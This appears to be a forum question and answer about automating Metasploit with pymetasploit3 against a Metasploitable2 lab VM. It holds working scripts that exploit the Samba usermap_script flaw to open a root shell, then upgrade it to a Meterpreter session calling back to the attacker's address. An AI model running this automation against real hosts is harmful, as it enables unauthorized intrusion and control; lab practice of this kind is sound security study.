
I am trying to get a meterpreter shell open on the metasploitable2 VM by running a python script on my Kali VM. All are connected to the same internal NAT network.

My goal for ethical hacking is to try and perform automation (pymetasploit3) of exploitation and post-exploitation.

I am so far able to use my python3 script, which imports the library pymetasploit3.msfrpc, with additional use of the msfconsole to open a session and issue normal Linux terminal commands.

My exploitation code: (test2.py)

import time
from pymetasploit3.msfrpc import MsfRpcClient
client = MsfRpcClient('mypassword', port=55552)
exploit = client.modules.use('exploit', 'multi/samba/usermap_script') #defining exploit to use
exploit['RHOSTS'] = "10.0.2.4" #metasploitable VM
exploit['RPORT'] = "139" #samba port
exploit.target = 0
payload = client.modules.use('payload', 'cmd/unix/bind_perl') #defining exploit's payload to use
payload['LPORT'] = 4444
exploit.execute(payload=payload)
time.sleep(10) #allow time for the command session to open before looking it up (the wait must come after execute, not before)
shell = client.sessions.session(list(client.sessions.list.keys())[0])
shell.write('whoami') #issuing commands to now opened shell
time.sleep(1) #give the shell a moment to return output before reading
print(shell.read()) #result = root
shell.write('hostname')
time.sleep(1)
print(shell.read()) #result = metasploitable

I have been following this guide for meterpreter escalation

My post-exploitation code (continues on from the previous code in test2.py):

payload1 = client.modules.use('payload', 'multi/manage/shell_to_meterpreter') #same exploitation but different payload
payload1['LPORT'] = 8080
payload1['SESSION'] = 1
exploit.execute(payload=payload1)
shell = client.sessions.session('1')
shell.write('whoami')
print(shell.read())
shell.write('hostname')
print(shell.read())

The result from msfconsole (including initial setup and result):

msfconsole #loads...
load msgrpc Pass=mypassword
#MSGRPC success messages
#loaded plugin: msgrpc
Command shell session 1 opened (0.0.0.0:0 -> 10.0.2.4:4444) at... #normal shell session active

Running the actual python code (test2.py): the code output's line 197 refers to:

payload1 = client.modules.use('payload', 'multi/manage/shell_to_meterpreter')

I am wondering what is the correct way to do this post-exploitation automation properly, and why the second payload is not working...

Also, if there is an easier way to get meterpreter open using a similar automation method, I am open to suggestions. Thanks

Amir Afianian

1 Answer


So lots of things were wrong but the solution was to run it in a separate script, then to switch into the meterpreter session.
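For readers who want the "separate script" approach spelled out, here is an added example that is not part of the question or the answer: in Metasploit, shell_to_meterpreter is a post module, not a payload, so it has to be loaded with module type 'post', and because it runs as a background job the new Meterpreter session appears asynchronously, so the script polls the session list instead of sleeping a fixed time. It assumes the msgrpc setup from the question (password 'mypassword', port 55552), an existing command shell session such as session 1 from test2.py, and a Kali address of 10.0.2.15, which is a placeholder.

```python
import time

# Metasploit ships shell_to_meterpreter as a POST module, not a payload, so it
# must be loaded with module type 'post' (a 'payload' lookup of this name fails).
POST_MODULE = 'multi/manage/shell_to_meterpreter'


def find_session(sessions, kind, exclude=()):
    """Return the id of the first session of type `kind` ('shell' or 'meterpreter')
    whose id is not in `exclude`, or None. `sessions` is what client.sessions.list returns."""
    for sid, info in sessions.items():
        if info.get('type') == kind and sid not in exclude:
            return sid
    return None


def wait_for_session(list_sessions, kind, exclude=(), timeout=60, interval=2, sleep=time.sleep):
    """Poll `list_sessions()` until a matching session exists (the module runs as a
    background job, so the session shows up asynchronously). Raises TimeoutError."""
    deadline = time.monotonic() + timeout
    while True:
        sid = find_session(list_sessions(), kind, exclude)
        if sid is not None:
            return sid
        if time.monotonic() >= deadline:
            raise TimeoutError('no %s session appeared within %ss' % (kind, timeout))
        sleep(interval)


def upgrade_to_meterpreter(client, shell_sid, lhost, lport=8080, timeout=60, interval=2):
    """Run shell_to_meterpreter against `shell_sid`; return the id of the new Meterpreter session."""
    before = set(client.sessions.list.keys())          # ids that already exist
    post = client.modules.use('post', POST_MODULE)
    post['SESSION'] = int(shell_sid)
    post['LHOST'] = lhost                               # Kali-side address the new session connects back to
    post['LPORT'] = lport
    post.execute()                                      # returns {'job_id': ..., 'uuid': ...}
    return wait_for_session(lambda: client.sessions.list, 'meterpreter',
                            exclude=before, timeout=timeout, interval=interval)


if __name__ == '__main__':
    from pymetasploit3.msfrpc import MsfRpcClient     # needs msfconsole with 'load msgrpc' as in the question
    client = MsfRpcClient('mypassword', port=55552)
    shell_sid = wait_for_session(lambda: client.sessions.list, 'shell')  # e.g. session 1 from test2.py
    met_sid = upgrade_to_meterpreter(client, shell_sid, lhost='10.0.2.15')  # 10.0.2.15 = assumed Kali address
    met = client.sessions.session(str(met_sid))
    met.write('sysinfo')
    time.sleep(2)                                       # give the session time to return output
    print(met.read())
```

Run it after test2.py has opened the command shell session; the original shell session stays open alongside the new Meterpreter one.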